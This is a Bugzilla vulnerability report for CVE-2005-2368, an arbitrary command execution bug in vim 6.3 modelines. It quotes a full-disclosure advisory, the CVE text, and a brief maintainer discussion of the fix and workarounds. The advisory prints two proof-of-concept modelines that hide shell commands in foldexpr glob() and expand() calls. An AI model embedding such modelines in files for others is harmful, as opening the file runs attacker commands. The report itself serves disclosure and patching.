Bugzilla – Bug 98300
VUL-0: CVE-2005-2368: vim modeline vuln again
Last modified: 2021-10-19 13:46:19 UTC
We received the following report via full-disclosure. The issue is public. We didn't fix modeline stuff in released distros in the past but it's increasingly making me nervous. Couldn't vim just ask whether it should execute modlines? Date: Mon, 25 Jul 2005 18:33:00 +0300 From: Georgi Guninski <guninski@guninski.com> To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Help poor children in Uganda Georgi Guninski security advisory #75, 2005 Help poor children in Uganda Systems affected: vim 6.3 Date: 25 July 2005 Legal Notice: This Advisory is Copyright (c) 2005 Georgi Guninski. You may not modify it and distribute it or distribute parts of it without the author's written permission - this especially applies to so called "vulnerabilities databases" and securityfocus, microsoft, cert and mitre. If you want to link to this content use the URL: http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html Anything in this document may change without notice. Disclaimer: The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: open file in vim 6.3 < 6.3.082 with modelines on, got owned. Details: --1-- vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`"): cannot be used in vulnerability databases. ----- --2-- vim: foldmethod=expr:foldexpr=expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"): cannot be used in vulnerability databases. ----- Workaround: 1. (preferred) Disable modelines via set modelines=0 and/or set nomodeline in .vimrc or 2. upgrade to 6.3.082 - patch available at: ftp://ftp.vim.org/pub/vim/patches/6.3/ -- where do you want bill gates to go today? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Candidate: CAN-2005-2368 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2368 Reference: FULLDISC:20050725 Help poor children in Uganda Reference: URL:http://lists.grok.org.uk/pipermail/full-disclosure/2005-July/035402.html Reference: MISC:http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html vim 6.3 before 6.3.082, with modelines enabled, allows attackers to execute arbitrary commands via shell metacharacters in the (1) glob or (2) expand commands of a foldexpr expression for calculating fold levels.
But we haven't have modelines enabled in ages?
That's just to prevent everyone from beeing vulnerable by default. Yet they are useful so people who know that turn them on.
Well, sure, but that's not our problem is it? Anyway--is it possible to turn on so vim asks to execute modelines?
I don't know, that's what I was asking you.
BTW, this bug is fixed in STABLE since July 21st.
CVE-2005-2368: CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)